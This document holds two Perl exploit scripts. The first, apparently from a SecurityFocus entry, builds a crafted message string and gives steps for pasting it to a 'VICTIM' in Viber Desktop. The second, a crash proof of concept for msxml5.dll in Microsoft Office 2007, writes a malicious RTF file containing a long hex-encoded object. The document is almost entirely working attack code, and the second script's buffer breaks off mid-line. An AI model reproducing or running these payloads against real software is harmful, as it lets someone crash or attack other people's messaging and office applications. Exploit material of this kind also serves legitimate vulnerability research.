#Source : https://www.securityfocus.com/bid/75217/info
# 1.run perl code
# 2.Copy the perl output text
# 3.Open Viber Desktop
# 4.Select Your VICTIM
# 5.Paste and Message
# 6.Enjoy
use open ':std', ':encoding(UTF-8)';
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
use MIME::Base64;
$ut="M7tktuYbL14T";
$utd = decode_base64($ut);
$lt="sNiw2KAg2KAg2Ao=";
$ltd = decode_base64($lt);
$bt="M7tktuYbL14T";
$btd = decode_base64($bt);
$junk="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9".
"Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9".
"Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9".
"Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9".
"Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9".
"Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9".
"Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9".
"Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9".
"Aq0Aq1Aq2Aq3Aq4Aq5Aq";
$tt="\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05";
$buffer = "A"x153; # 100xA
$buffer1 = "A"x63; #5xA
print "\n\n$utd$buffer$ltd$tt$buffer1$junk$btd\n\n";
#END <3
#!/usr/bin/perl -w
# Title : Microsoft Office 2007 msxml5.dll - Crash Proof Of Concept
# Tested : Microsoft Office 2007 / Win7
# DLL : msxml5.dll 5.20.1072.0
# WINWORD.EXE version : 12.0.6612.1000
#
#
# Author : Mohammad Reza Espargham
# Linkedin : https://ir.linkedin.com/in/rezasp
# E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
# Website : www.reza.es
# Twitter : https://twitter.com/rezesp
# FaceBook : https://www.facebook.com/mohammadreza.espargham
#
#Demo : http://youtu.be/Eciu50k7vbI
open FILE, ">poc.rtf";
$buffer="\x7b\x5c\x72\x74\x66\x31\x7b\x5c\x66\x6f\x6e\x74\x74\x62\x6c\x7b\x5c\x66\x30\x5c".#rtf1 Standard Header...
"\x66\x6e\x69\x6c\x5c\x66\x63\x68\x61\x72\x73\x65\x74\x30\x56\x65\x72\x64\x61\x6e\x61\x3b".
"\x7d\x7d\x5c\x76\x69\x65\x77\x6b\x69\x6e\x64\x34\x5c\x75\x63\x31\x5c\x70\x61\x72\x64\x5c".
"\x73\x62\x31\x30\x30\x5c\x73\x61\x31\x30\x30\x5c\x6c\x61\x6e\x67\x39\x5c\x66\x30\x5c\x66".
"\x73\x32\x32\x5c\x70\x61\x72\x5c\x70\x61\x72\x64\x5c\x73\x61\x32\x30\x30\x5c\x73\x6c\x32".
"\x37\x36\x5c\x73\x6c\x6d\x75\x6c\x74\x31\x5c\x6c\x61\x6e\x67\x39\x5c\x66\x73\x32\x32\x5c".
"\x70\x61\x72\x7b\x5c\x6f\x62\x6a\x65\x63\x74\x5c\x6f\x62\x6a\x6f\x63\x78\x7b\x5c\x2a\x5c".
"\x6f\x62\x6a\x64\x61\x74\x61\x0a\x30\x31\x30\x35\x30\x30\x30\x30\x30\x32\x30\x30\x30\x30".
"\x30\x30\x31\x42\x30\x30\x30\x30\x30\x30\x34\x44\x35\x33\x34\x33\x36\x46\x36\x44\x36\x33\x37\x34\x36\x43\x34\x43\x36\x39\x36\x32\x32\x45\x34\x43\x36\x39\x37\x33\x37\x34\x35\x36\x36\x39\x36\x35\x37\x37\x34\x33\x37\x34\x37\x32\x36\x43\x32\x45\x33\x32\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x45\x30\x30\x30\x30\x0a\x44\x30\x43\x46\x31\x31\x45\x30\x41\x31\x42\x31\x31\x41\x45\x31\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x33\x45\x30\x30\x30\x33\x30\x30\x46\x45\x46\x46\x30\x39\x30\x30\x30\x36\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x31\x30\x30\x30\x30\x30\x30\x30\x31\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x31\x30\x30\x30\x30\x30\x30\x32\x30\x30\x30\x30\x30\x30\x30\x31\x30\x30\x30\x30\x30\x30\x46\x45\x46\x46\x46\x46\x46\x46\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46".
"\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x44\x46\x46\x46\x46\x46\x46\x46\x45\x46\x46\x46\x46\x46\x46\x46\x45\x46\x46\x46\x46\x46\x46\x30\x34\x30\x30\x30\x30\x30\x30\x30\x35\x30\x30\x30\x30\x30\x30\x46\x45\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x35\x32\x30\x30\x36\x46\x30\x30\x36\x46\x30\x30\x37\x34\x30\x30\x32\x30\x30\x30\x34\x35\x30\x30\x36\x45\x30\x30\x37\x34\x30\x30\x37\x32\x30\x30\x37\x39\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x31\x36\x30\x30\x30\x35\x30\x30\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x30\x32\x30\x30\x30\x30\x30\x30\x34\x42\x46\x30\x44\x31\x42\x44\x38\x42\x38\x35\x44\x31\x31\x31\x42\x31\x36\x41\x30\x30\x43\x30\x46\x30\x32\x38\x33\x36\x32\x38\x30\x30\x30\x30\x30\x30\x30\x30\x36\x32\x65\x61\x44\x46\x42\x39\x33\x34\x30\x44\x43\x44\x30\x31\x34\x35\x35\x39\x44\x46\x42\x39\x33\x34\x30\x44\x43\x44\x30\x31\x30\x33\x30\x30\x30\x30\x30\x30\x30\x30\x30\x36\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x33\x30\x30\x34\x46\x30\x30\x36\x32\x30\x30\x36\x41\x30\x30\x34\x39\x30\x30\x36\x45\x30\x30\x36\x36\x30\x30\x36\x46\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x31\x32\x30\x30\x30\x32\x30\x30\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30".
"\x30\x30\x36\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x33\x30\x30\x34\x46\x30\x30\x34\x33\x30\x30\x35\x38\x30\x30\x34\x45\x30\x30\x34\x31\x30\x30\x34\x44\x30\x30\x34\x35\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x31\x32\x30\x30\x30\x32\x30\x31\x30\x31\x30\x30\x30\x30\x30\x30\x30\x33\x30\x30\x30\x30\x30\x30\x46\x46\x46\x46\x46\x46\x46\x46\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x31\x30\x30\x30\x30\x30\x30\x31\x36\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x34\x33\x30\x30\x36\x46\x30\x30\x36\x45\x30\x30\x37\x34\x30\x30\x36\x35\x30\x30\x36\x45\x30\x30\x37\x34\x30\x30\x37\x33\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x31\x32\x30\x30\x30\x32\x30\x30\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x32\x30\x30\x30\x30\x30\x30\x37\x45\x30\x35\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x46\x45\x46\x46\x46\x46\x46\x46\x46\x45\x46\x46\x46\x46\x46\x46\x30\x33\x30\x30\x30\x30\x30\x30\x30\x34\x30\x30\x30\x30\x30\x30\x30\x35\x30\x30\x30\x30\x30\x30\x30\x36\x30\x30\x30\x30\x30\x30\x30\x37\x30\x30\x30\x30\x30\x30\x30\x38\x30\x30\x30\x30\x30\x30\x30\x39\x30\x30\x30\x30\x30\x30\x30\x41\x30\x30\x30\x30\x30\x30\x30\x42\x30\x30\x30\x30\x30\x30\x30\x43\x30\x30\x30\x30\x30\x30\x30\x44\x30\x30\x30\x30\x30\x30\x30\x45\x30\x30\x30\x30\x30\x30\x30\x46\x30\x30\x30\x30\x30\x30\x31\x30\x30\x30\x30\x30\x30\x30\x31\x31\x30\x30\x30\x30\x30\x30\x31\x32\x30\x30\x30\x30\x30\x30\x31\x33\x30\x30\x30\x30\x30\x30\x31\x34\x30\x30\x30\x30\x30\x30\x31\x35\x30\x30\x30\x30\x30\x30\x31\x36\x30\x30\x30\x30\x30\x30\x31\x37\x30\x30\x30\x30\x30\x30\x46\x45\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x30\x30\x39\x32\x30\x33\x30\x30\x30\x34\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x34\x43\x30\x30\x36\x39\x30\x30\x37\x33\x30\x30\x37\x34\x30\x30\